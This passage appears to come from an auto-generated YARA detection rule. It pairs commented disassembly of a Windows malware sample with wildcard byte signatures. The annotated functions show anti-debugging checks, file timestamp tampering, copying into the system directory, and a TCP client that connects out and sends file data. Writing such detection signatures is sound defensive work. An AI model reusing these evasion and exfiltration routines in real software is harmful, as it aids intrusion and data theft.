.text:0x00401940 loc_00401940: [1 XREFS] + .text:0x00401940 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401943 51 push ecx + .text:0x00401944 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004018fc>) + .text:0x0040194a 6a00 push 0 + .text:0x0040194c 6880000000 push 128 + .text:0x00401951 6a03 push 3 + .text:0x00401953 6a00 push 0 + .text:0x00401955 6a02 push 2 + .text:0x00401957 6800000040 push 0x40000000 + .text:0x0040195c 8b5508 mov edx,dword [ebp + 8] + .text:0x0040195f 52 push edx + .text:0x00401960 ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0) + .text:0x00401966 8945e4 mov dword [ebp - 28],eax + .text:0x00401969 8d45f0 lea eax,dword [ebp - 16] + .text:0x0040196c 50 push eax + .text:0x0040196d 8d4de8 lea ecx,dword [ebp - 24] + .text:0x00401970 51 push ecx + .text:0x00401971 8d55f8 lea edx,dword [ebp - 8] + .text:0x00401974 52 push edx + .text:0x00401975 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401978 50 push eax + .text:0x00401979 ff1554b04000 call dword [0x0040b054] ;kernel32.SetFileTime(kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0),local12,local28,local20) + .text:0x0040197f 85c0 test eax,eax + .text:0x00401981 7511 jnz 0x00401994 + .text:0x00401983 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401986 51 push ecx + .text:0x00401987 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401960>) + .text:0x0040198d b801000000 mov eax,1 + .text:0x00401992 eb0c jmp 0x004019a0 + .text:0x00401994 loc_00401994: [1 XREFS] + .text:0x00401994 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401997 52 push edx + .text:0x00401998 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401960>) + .text:0x0040199e 33c0 xor eax,eax + .text:0x004019a0 loc_004019a0: [3 XREFS] + .text:0x004019a0 5f pop edi + .text:0x004019a1 5e pop esi + .text:0x004019a2 5b pop ebx + .text:0x004019a3 8be5 mov esp,ebp + .text:0x004019a5 5d pop ebp + .text:0x004019a6 c3 ret + */ + $c28 = { 55 8B EC 83 EC 28 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 02 68 00 00 00 40 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004019b0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - get common file path + .text:0x004019b0 + .text:0x004019b0 FUNC: int cdecl sub_004019b0( int arg0, ) [4 XREFS] + .text:0x004019b0 + .text:0x004019b0 Stack Variables: (offset from initial top of stack) + .text:0x004019b0 4: int arg0 + .text:0x004019b0 -1028: int local1028 + .text:0x004019b0 -1032: int local1032 + .text:0x004019b0 -1036: int local1036 + .text:0x004019b0 -1040: int local1040 + .text:0x004019b0 + .text:0x004019b0 55 push ebp + .text:0x004019b1 8bec mov ebp,esp + .text:0x004019b3 81ec0c040000 sub esp,1036 + .text:0x004019b9 53 push ebx + .text:0x004019ba 56 push esi + .text:0x004019bb 57 push edi + .text:0x004019bc c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004019c6 c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004019d0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004019d6 8a5802 mov bl,byte [eax + 2] + .text:0x004019d9 889dfcfbffff mov byte [ebp - 1028],bl + .text:0x004019df 0fbe85fcfbffff movsx eax,byte [ebp - 1028] + .text:0x004019e6 85c0 test eax,eax + .text:0x004019e8 7405 jz 0x004019ef + .text:0x004019ea e811f6ffff call 0x00401000 ;sub_00401000() + .text:0x004019ef loc_004019ef: [1 XREFS] + .text:0x004019ef 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004019f5 8b4018 mov eax,dword [eax + 24] + .text:0x004019f8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004019fc 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00401a02 83bdf8fbffff00 cmp dword [ebp - 1032],0 + .text:0x00401a09 7405 jz 0x00401a10 + .text:0x00401a0b e8f0f5ffff call 0x00401000 ;sub_00401000() + .text:0x00401a10 loc_00401a10: [1 XREFS] + .text:0x00401a10 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401a16 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401a1a 83e870 sub eax,112 + .text:0x00401a1d 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00401a23 83bdf4fbffff00 cmp dword [ebp - 1036],0 + .text:0x00401a2a 7505 jnz 0x00401a31 + .text:0x00401a2c e8cff5ffff call 0x00401000 ;sub_00401000() + .text:0x00401a31 loc_00401a31: [1 XREFS] + .text:0x00401a31 6800040000 push 1024 + .text:0x00401a36 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00401a3c 51 push ecx + .text:0x00401a3d ff1548b04000 call dword [0x0040b048] ;kernel32.GetSystemDirectoryA(local1028,1024) + .text:0x00401a43 85c0 test eax,eax + .text:0x00401a45 7507 jnz 0x00401a4e + .text:0x00401a47 b801000000 mov eax,1 + .text:0x00401a4c eb54 jmp 0x00401aa2 + .text:0x00401a4e loc_00401a4e: [1 XREFS] + .text:0x00401a4e bf70c04000 mov edi,0x0040c070 + .text:0x00401a53 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00401a59 83c9ff or ecx,0xffffffff + .text:0x00401a5c 33c0 xor eax,eax + .text:0x00401a5e f2ae repnz: scasb + .text:0x00401a60 f7d1 not ecx + .text:0x00401a62 2bf9 sub edi,ecx + .text:0x00401a64 8bf7 mov esi,edi + .text:0x00401a66 8bd9 mov ebx,ecx + .text:0x00401a68 8bfa mov edi,edx + .text:0x00401a6a 83c9ff or ecx,0xffffffff + .text:0x00401a6d 33c0 xor eax,eax + .text:0x00401a6f f2ae repnz: scasb + .text:0x00401a71 83c7ff add edi,0xffffffff + .text:0x00401a74 8bcb mov ecx,ebx + .text:0x00401a76 c1e902 shr ecx,2 + .text:0x00401a79 f3a5 rep: movsd + .text:0x00401a7b 8bcb mov ecx,ebx + .text:0x00401a7d 83e103 and ecx,3 + .text:0x00401a80 f3a4 rep: movsb + .text:0x00401a82 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00401a88 50 push eax + .text:0x00401a89 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401a8c 51 push ecx + .text:0x00401a8d e8eefdffff call 0x00401880 ;sub_00401880(arg0,local1028) + .text:0x00401a92 83c408 add esp,8 + .text:0x00401a95 85c0 test eax,eax + .text:0x00401a97 7407 jz 0x00401aa0 + .text:0x00401a99 b801000000 mov eax,1 + .text:0x00401a9e eb02 jmp 0x00401aa2 + .text:0x00401aa0 loc_00401aa0: [1 XREFS] + .text:0x00401aa0 33c0 xor eax,eax + .text:0x00401aa2 loc_00401aa2: [2 XREFS] + .text:0x00401aa2 5f pop edi + .text:0x00401aa3 5e pop esi + .text:0x00401aa4 5b pop ebx + .text:0x00401aa5 8be5 mov esp,ebp + .text:0x00401aa7 5d pop ebp + .text:0x00401aa8 c3 ret + */ + $c29 = { 55 8B EC 81 EC 0C 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? BF 70 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401ab0@7faafc7e4a5c736ebfee6abbbc812d80 with 5 features: + - act as TCP client + - check for PEB NtGlobalFlag flag + - connect TCP socket + - initialize Winsock library + - resolve DNS + .text:0x00401ab0 + .text:0x00401ab0 FUNC: int cdecl sub_00401ab0( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x00401ab0 + .text:0x00401ab0 Stack Variables: (offset from initial top of stack) + .text:0x00401ab0 12: int arg2 + .text:0x00401ab0 8: int arg1 + .text:0x00401ab0 4: int arg0 + .text:0x00401ab0 -404: int local404 + .text:0x00401ab0 -408: int local408 + .text:0x00401ab0 -420: int local420 + .text:0x00401ab0 -422: int local422 + .text:0x00401ab0 -424: int local424 + .text:0x00401ab0 -428: int local428 + .text:0x00401ab0 -432: int local432 + .text:0x00401ab0 -436: int local436 + .text:0x00401ab0 + .text:0x00401ab0 55 push ebp + .text:0x00401ab1 8bec mov ebp,esp + .text:0x00401ab3 81ecb0010000 sub esp,432 + .text:0x00401ab9 53 push ebx + .text:0x00401aba 56 push esi + .text:0x00401abb 57 push edi + .text:0x00401abc c78554feffff0000 mov dword [ebp - 428],0 + .text:0x00401ac6 c78550feffff0000 mov dword [ebp - 432],0 + .text:0x00401ad0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401ad6 8a5802 mov bl,byte [eax + 2] + .text:0x00401ad9 889d58feffff mov byte [ebp - 424],bl + .text:0x00401adf 0fbe8558feffff movsx eax,byte [ebp - 424] + .text:0x00401ae6 85c0 test eax,eax + .text:0x00401ae8 7405 jz 0x00401aef + .text:0x00401aea e811f5ffff call 0x00401000 ;sub_00401000() + .text:0x00401aef loc_00401aef: [1 XREFS] + .text:0x00401aef 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401af5 8b4018 mov eax,dword [eax + 24] + .text:0x00401af8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401afc 898554feffff mov dword [ebp - 428],eax + .text:0x00401b02 83bd54feffff00 cmp dword [ebp - 428],0 + .text:0x00401b09 7405 jz 0x00401b10 + .text:0x00401b0b e8f0f4ffff call 0x00401000 ;sub_00401000() + .text:0x00401b10 loc_00401b10: [1 XREFS] + .text:0x00401b10 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401b16 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401b1a 83e870 sub eax,112 + .text:0x00401b1d 898550feffff mov dword [ebp - 432],eax + .text:0x00401b23 83bd50feffff00 cmp dword [ebp - 432],0 + .text:0x00401b2a 7505 jnz 0x00401b31 + .text:0x00401b2c e8cff4ffff call 0x00401000 ;sub_00401000() + .text:0x00401b31 loc_00401b31: [1 XREFS] + .text:0x00401b31 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b34 c701ffffffff mov dword [ecx],0xffffffff + .text:0x00401b3a 8d9570feffff lea edx,dword [ebp - 400] + .text:0x00401b40 52 push edx + .text:0x00401b41 6802020000 push 514 + .text:0x00401b46 ff1544b14000 call dword [0x0040b144] ;ws2_32.WSAStartup(514,local404) + .text:0x00401b4c 85c0 test eax,eax + .text:0x00401b4e 740a jz 0x00401b5a + .text:0x00401b50 b801000000 mov eax,1 + .text:0x00401b55 e9bb000000 jmp 0x00401c15 + .text:0x00401b5a loc_00401b5a: [1 XREFS] + .text:0x00401b5a 8b450c mov eax,dword [ebp + 12] + .text:0x00401b5d 50 push eax + .text:0x00401b5e ff1548b14000 call dword [0x0040b148] ;ws2_32.gethostbyname(arg1) + .text:0x00401b64 89856cfeffff mov dword [ebp - 404],eax + .text:0x00401b6a 83bd6cfeffff00 cmp dword [ebp - 404],0 + .text:0x00401b71 7510 jnz 0x00401b83 + .text:0x00401b73 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401b79 b801000000 mov eax,1 + .text:0x00401b7e e992000000 jmp 0x00401c15 + .text:0x00401b83 loc_00401b83: [1 XREFS] + .text:0x00401b83 6a06 push 6 + .text:0x00401b85 6a01 push 1 + .text:0x00401b87 6a02 push 2 + .text:0x00401b89 ff1550b14000 call dword [0x0040b150] ;ws2_32.socket(2,1,6) + .text:0x00401b8f 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b92 8901 mov dword [ecx],eax + .text:0x00401b94 8b5508 mov edx,dword [ebp + 8] + .text:0x00401b97 833aff cmp dword [edx],0xffffffff + .text:0x00401b9a 750d jnz 0x00401ba9 + .text:0x00401b9c ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401ba2 b801000000 mov eax,1 + .text:0x00401ba7 eb6c jmp 0x00401c15 + .text:0x00401ba9 loc_00401ba9: [1 XREFS] + .text:0x00401ba9 66c7855cfeffff02 mov word [ebp - 420],2 + .text:0x00401bb2 8b856cfeffff mov eax,dword [ebp - 404] + .text:0x00401bb8 8b480c mov ecx,dword [eax + 12] + .text:0x00401bbb 8b11 mov edx,dword [ecx] + .text:0x00401bbd 8b02 mov eax,dword [edx] + .text:0x00401bbf 898560feffff mov dword [ebp - 416],eax + .text:0x00401bc5 668b4d10 mov cx,word [ebp + 16] + .text:0x00401bc9 51 push ecx + .text:0x00401bca ff1554b14000 call dword [0x0040b154] ;ws2_32.htons(0x6161500f) + .text:0x00401bd0 6689855efeffff mov word [ebp - 418],ax + .text:0x00401bd7 6a10 push 16 + .text:0x00401bd9 8d955cfeffff lea edx,dword [ebp - 420] + .text:0x00401bdf 52 push edx + .text:0x00401be0 8b4508 mov eax,dword [ebp + 8] + .text:0x00401be3 8b08 mov ecx,dword [eax] + .text:0x00401be5 51 push ecx + .text:0x00401be6 ff1558b14000 call dword [0x0040b158] ;ws2_32.connect(0x61616161,local424,16) + .text:0x00401bec 83f8ff cmp eax,0xffffffff + .text:0x00401bef 7522 jnz 0x00401c13 + .text:0x00401bf1 8b5508 mov edx,dword [ebp + 8] + .text:0x00401bf4 8b02 mov eax,dword [edx] + .text:0x00401bf6 50 push eax + .text:0x00401bf7 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401bfd 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401c00 c701ffffffff mov dword [ecx],0xffffffff + .text:0x00401c06 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401c0c b801000000 mov eax,1 + .text:0x00401c11 eb02 jmp 0x00401c15 + .text:0x00401c13 loc_00401c13: [1 XREFS] + .text:0x00401c13 33c0 xor eax,eax + .text:0x00401c15 loc_00401c15: [4 XREFS] + .text:0x00401c15 5f pop edi + .text:0x00401c16 5e pop esi + .text:0x00401c17 5b pop ebx + .text:0x00401c18 8be5 mov esp,ebp + .text:0x00401c1a 5d pop ebp + .text:0x00401c1b c3 ret + */ + $c30 = { 55 8B EC 81 EC B0 01 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? C7 01 FF FF FF FF 8D 95 ?? ?? ?? ?? 52 68 02 02 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? 83 3A FF 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 66 C7 85 ?? ?? ?? ?? 02 00 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 89 85 ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A 10 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 8B 08 51 FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 8B 55 ?? 8B 02 50 FF 15 ?? ?? ?? ?? 8B 4D ?? C7 01 FF FF FF FF FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401c20@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00401c20 + .text:0x00401c20 FUNC: int cdecl sub_00401c20( int arg0, ) [24 XREFS] + .text:0x00401c20 + .text:0x00401c20 Stack Variables: (offset from initial top of stack) + .text:0x00401c20 4: int arg0 + .text:0x00401c20 -8: int local8 + .text:0x00401c20 -12: int local12 + .text:0x00401c20 -16: int local16 + .text:0x00401c20 + .text:0x00401c20 55 push ebp + .text:0x00401c21 8bec mov ebp,esp + .text:0x00401c23 83ec0c sub esp,12 + .text:0x00401c26 53 push ebx + .text:0x00401c27 56 push esi + .text:0x00401c28 57 push edi + .text:0x00401c29 c745f800000000 mov dword [ebp - 8],0 + .text:0x00401c30 c745f400000000 mov dword [ebp - 12],0 + .text:0x00401c37 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c3d 8a5802 mov bl,byte [eax + 2] + .text:0x00401c40 885dfc mov byte [ebp - 4],bl + .text:0x00401c43 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00401c47 85c0 test eax,eax + .text:0x00401c49 7405 jz 0x00401c50 + .text:0x00401c4b e8b0f3ffff call 0x00401000 ;sub_00401000() + .text:0x00401c50 loc_00401c50: [1 XREFS] + .text:0x00401c50 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c56 8b4018 mov eax,dword [eax + 24] + .text:0x00401c59 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401c5d 8945f8 mov dword [ebp - 8],eax + .text:0x00401c60 837df800 cmp dword [ebp - 8],0 + .text:0x00401c64 7405 jz 0x00401c6b + .text:0x00401c66 e895f3ffff call 0x00401000 ;sub_00401000() + .text:0x00401c6b loc_00401c6b: [1 XREFS] + .text:0x00401c6b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c71 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401c75 83e870 sub eax,112 + .text:0x00401c78 8945f4 mov dword [ebp - 12],eax + .text:0x00401c7b 837df400 cmp dword [ebp - 12],0 + .text:0x00401c7f 7505 jnz 0x00401c86 + .text:0x00401c81 e87af3ffff call 0x00401000 ;sub_00401000() + .text:0x00401c86 loc_00401c86: [1 XREFS] + .text:0x00401c86 6a01 push 1 + .text:0x00401c88 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401c8b 8b11 mov edx,dword [ecx] + .text:0x00401c8d 52 push edx + .text:0x00401c8e ff1540b14000 call dword [0x0040b140] ;ws2_32.shutdown(0x61616161,1) + .text:0x00401c94 83f8ff cmp eax,0xffffffff + .text:0x00401c97 7519 jnz 0x00401cb2 + .text:0x00401c99 8b4508 mov eax,dword [ebp + 8] + .text:0x00401c9c 8b08 mov ecx,dword [eax] + .text:0x00401c9e 51 push ecx + .text:0x00401c9f ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401ca5 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401cab b801000000 mov eax,1 + .text:0x00401cb0 eb14 jmp 0x00401cc6 + .text:0x00401cb2 loc_00401cb2: [1 XREFS] + .text:0x00401cb2 8b5508 mov edx,dword [ebp + 8] + .text:0x00401cb5 8b02 mov eax,dword [edx] + .text:0x00401cb7 50 push eax + .text:0x00401cb8 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401cbe ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401cc4 33c0 xor eax,eax + .text:0x00401cc6 loc_00401cc6: [1 XREFS] + .text:0x00401cc6 5f pop edi + .text:0x00401cc7 5e pop esi + .text:0x00401cc8 5b pop ebx + .text:0x00401cc9 8be5 mov esp,ebp + .text:0x00401ccb 5d pop ebp + .text:0x00401ccc c3 ret + */ + $c31 = { 55 8B EC 83 EC 0C 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 01 8B 4D ?? 8B 11 52 FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 8B 45 ?? 8B 08 51 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 55 ?? 8B 02 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401cd0@7faafc7e4a5c736ebfee6abbbc812d80 with 3 features: + - check for PEB NtGlobalFlag flag + - send data + - send data on socket + .text:0x00401cd0 + .text:0x00401cd0 FUNC: int cdecl sub_00401cd0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401cd0 + .text:0x00401cd0 Stack Variables: (offset from initial top of stack) + .text:0x00401cd0 12: int arg2 + .text:0x00401cd0 8: int arg1 + .text:0x00401cd0 4: int arg0 + .text:0x00401cd0 -8: int local8 + .text:0x00401cd0 -12: int local12 + .text:0x00401cd0 -524: int local524 + .text:0x00401cd0 -528: int local528 + .text:0x00401cd0 -532: int local532 + .text:0x00401cd0 -536: int local536 + .text:0x00401cd0 -540: int local540 + .text:0x00401cd0 -544: int local544 + .text:0x00401cd0 + .text:0x00401cd0 55 push ebp + .text:0x00401cd1 8bec mov ebp,esp + .text:0x00401cd3 81ec1c020000 sub esp,540 + .text:0x00401cd9 53 push ebx + .text:0x00401cda 56 push esi + .text:0x00401cdb 57 push edi + .text:0x00401cdc c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401ce3 c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00401ced c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401cf7 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401cfd 8a5802 mov bl,byte [eax + 2] + .text:0x00401d00 889decfdffff mov byte [ebp - 532],bl + .text:0x00401d06 0fbe85ecfdffff movsx eax,byte [ebp - 532] + .text:0x00401d0d 85c0 test eax,eax + .text:0x00401d0f 7405 jz 0x00401d16 + .text:0x00401d11 e8eaf2ffff call 0x00401000 ;sub_00401000() + .text:0x00401d16 loc_00401d16: [1 XREFS] + .text:0x00401d16 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401d1c 8b4018 mov eax,dword [eax + 24] + .text:0x00401d1f 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401d23 8985e8fdffff mov dword [ebp - 536],eax + .text:0x00401d29 83bde8fdffff00 cmp dword [ebp - 536],0 + .text:0x00401d30 7405 jz 0x00401d37 + .text:0x00401d32 e8c9f2ffff call 0x00401000 ;sub_00401000() + .text:0x00401d37 loc_00401d37: [1 XREFS] + .text:0x00401d37 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401d3d 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401d41 83e870 sub eax,112 + .text:0x00401d44 8985e4fdffff mov dword [ebp - 540],eax + .text:0x00401d4a 83bde4fdffff00 cmp dword [ebp - 540],0 + .text:0x00401d51 7505 jnz 0x00401d58 + .text:0x00401d53 e8a8f2ffff call 0x00401000 ;sub_00401000() + .text:0x00401d58 loc_00401d58: [1 XREFS] + .text:0x00401d58 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00401d5b 51 push ecx + .text:0x00401d5c 8b5508 mov edx,dword [ebp + 8] + .text:0x00401d5f 52 push edx + .text:0x00401d60 8d45fc lea eax,dword [ebp - 4] + .text:0x00401d63 50 push eax + .text:0x00401d64 e847fdffff call 0x00401ab0 ;sub_00401ab0(local8,arg0,arg1) + .text:0x00401d69 83c40c add esp,12 + .text:0x00401d6c 85c0 test eax,eax + .text:0x00401d6e 740a jz 0x00401d7a + .text:0x00401d70 b801000000 mov eax,1 + .text:0x00401d75 e9a0000000 jmp 0x00401e1a + .text:0x00401d7a loc_00401d7a: [2 XREFS] + .text:0x00401d7a c785f4fdffff0000 mov dword [ebp - 524],0 + .text:0x00401d84 8b4d10 mov ecx,dword [ebp + 16] + .text:0x00401d87 51 push ecx + .text:0x00401d88 6800020000 push 512 + .text:0x00401d8d 6a01 push 1 + .text:0x00401d8f 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401d95 52 push edx + .text:0x00401d96 e89a1c0000 call 0x00403a35 ;?(local524,1,512,arg2) + .text:0x00401d9b 83c410 add esp,16 + .text:0x00401d9e 8945f8 mov dword [ebp - 8],eax + .text:0x00401da1 loc_00401da1: [1 XREFS] + .text:0x00401da1 6a00 push 0 + .text:0x00401da3 8b45f8 mov eax,dword [ebp - 8] + .text:0x00401da6 50 push eax + .text:0x00401da7 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x00401dad 51 push ecx + .text:0x00401dae 8b55fc mov edx,dword [ebp - 4] + .text:0x00401db1 52 push edx + .text:0x00401db2 ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,sub_00403a35(local524,1,512,arg2),0) + .text:0x00401db8 8985f0fdffff mov dword [ebp - 528],eax + .text:0x00401dbe 83bdf0fdffffff cmp dword [ebp - 528],0xffffffff + .text:0x00401dc5 7513 jnz 0x00401dda + .text:0x00401dc7 8d45fc lea eax,dword [ebp - 4] + .text:0x00401dca 50 push eax + .text:0x00401dcb e850feffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401dd0 83c404 add esp,4 + .text:0x00401dd3 b801000000 mov eax,1 + .text:0x00401dd8 eb40 jmp 0x00401e1a + .text:0x00401dda loc_00401dda: [1 XREFS] + .text:0x00401dda 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00401de0 038df0fdffff add ecx,dword [ebp - 528] + .text:0x00401de6 898df4fdffff mov dword [ebp - 524],ecx + .text:0x00401dec 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x00401df2 3b55f8 cmp edx,dword [ebp - 8] + .text:0x00401df5 72aa jc 0x00401da1 + .text:0x00401df7 837df800 cmp dword [ebp - 8],0 + .text:0x00401dfb 0f8779ffffff ja 0x00401d7a + .text:0x00401e01 8d45fc lea eax,dword [ebp - 4] + .text:0x00401e04 50 push eax + .text:0x00401e05 e816feffff call 0x00401c20 ;sub_00401c20(local8) + .text:0x00401e0a 83c404 add esp,4 + .text:0x00401e0d 85c0 test eax,eax + .text:0x00401e0f 7407 jz 0x00401e18 + .text:0x00401e11 b801000000 mov eax,1 + .text:0x00401e16 eb02 jmp 0x00401e1a + .text:0x00401e18 loc_00401e18: [1 XREFS] + .text:0x00401e18 33c0 xor eax,eax + .text:0x00401e1a loc_00401e1a: [3 XREFS] + .text:0x00401e1a 5f pop edi + .text:0x00401e1b 5e pop esi + .text:0x00401e1c 5b pop ebx + 